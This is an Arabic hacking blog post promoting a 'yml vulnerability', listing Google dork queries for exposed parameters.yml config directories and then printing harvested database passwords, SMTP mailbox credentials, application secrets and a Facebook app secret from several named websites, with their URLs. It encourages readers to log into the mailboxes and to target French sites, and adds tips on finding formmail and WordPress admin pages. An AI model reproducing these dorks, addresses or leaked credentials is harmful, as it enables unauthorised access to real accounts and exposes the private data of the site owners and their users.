ثغره yml تمكنك بالدخول على الايميل وبيانات الموقع جاهزه

الكاتب :هكركوز الكويت التاريخ :
0
مشاهدات الان

 البحث عن

Index of /ch/app/config
Index of /app/config
intitle:"index of" "/parameters.yml*"
intitle:"index of" "parameters.yml.test" OR "parameters.yml.dist"

Index of /myddleware/app/config

جربوها على مواقع الفرنسيه الحقيره : وهذا شرحي الخاص لكم هديه

http://community.myddleware.com/index.php/installation-guide/#copying-files-to-web-server

http://community.myddleware.com/index.php/installation-guide/#copying-files-to-web-server

تم اكتشاف المصدر لبرمجه لـ  Myddleware

امثله بروابطها
http://194.140.183.244/ccalinares.com/intranet/app/config/parameters.yml
البيانات جاهزه
database_host: 127.0.0.1
database_port: null
database_name: CCALINARES
database_user: CCALINARES
database_password: VRDrdqWojFZkLg1V
بيانات الموقع
mailer_transport: smtp
mailer_host: mail.ccalinares.com
mailer_user: intranet@ccalinares.com
mailer_password: fx9T7Pgo
بيانات الايميل
port: 587
secret: GrupoLinaredHastaElInfinitoYMasAlla
الثاني
http://www.paintchecker.com/contao/config/parameters.yml
https://medium.com/@fellsec/hackthebox-write-up-nineveh-23fc607325d0

# This file has been auto-generated during installation
parameters:
database_host: localhost
database_port: 3306
database_user: contaouser
database_password: 'asdf75SArh8qj5ner4q#ertjQRH'
database_name: contaodb
secret: 29a2455ba3dc649df29f4abbb8bd3fd68ca42b39258d45dbfa4e52fbf6995385
#mailer to send form data
mailer_transport: smtp
mailer_host: mail.gmx.net
mailer_user: optisense@gmx.de
mailer_password: d8ebub4v
mailer_port: 587
mailer_encryption: tls
#multilanguage support
prepend_locale: true
الدخول على الايميل هنا جرب
https://hkrkoz9.blogspot.com/2018/01/mail2web-1997_28.html
ويمكنك التجرب لبيانات الموقع نفسه او تجربه على الاق تي بي مثلا
* وكيف التعرف على ان الموقع مركب الورد سوي عرض صفحه
/wp-admin

الاكتشاف من هذي الثغره : Index of /formmail

اذا وجده هذا انسي الاختراق : error_log

+ form.html

+ enquiry.php انزله اذا وجدته هنا البيانات

عشوائي اكتشافي

http://servemail.in/

thisistest@servemail.in

5VKUe]fA_.,3

siliconhousesh@gmail.com

=======================================

http://nauweb.freehostia.com/moodle/moodle.sql

guest

084e0343a0486ff05530df6c705c8bb4

admin

wavster@gmail.com

kathmandu

home/www/nauweb.freehostia.com/moodle/question/question2.php

=======================================

    database_name: apptivist

    database_user: apptivist

    database_password: ochiageikAt0

    mailer_transport: gmail

    mailer_host: null

    mailer_user: apptivistagp@gmail.com 

    mailer_password: Zabala3873

    secret: 5026f63b273dd9fa0c70c9d1c4ceb1af5fb17b27

    dev_mail_delivery_address: 

    email_sender_from_address: apptivistagp@gmail.com

    facebook_appid: '845170882172618'

    facebook_secret: 001a636a8c606d60bf56c31d02a3f6b4

=======================================

    database_name: ehealthr_main

    database_user: ehealthr_usr

    database_password: ehr2015

    mailer_transport: smtp

    mailer_host: mail.ehealthreporter.com

    mailer_user: noreply@ehealthreporter.com

    mailer_password: Mkx2015-

    secret: 375e9c0417b214501e7b7bc2dd9377da013433d5

https://mail.ehealthreporter.com/app/config/parameters.yml

وسلامتكم

القسم :

قد تُعجبك هذه المشاركات

إرسال تعليق

أحدث أقدم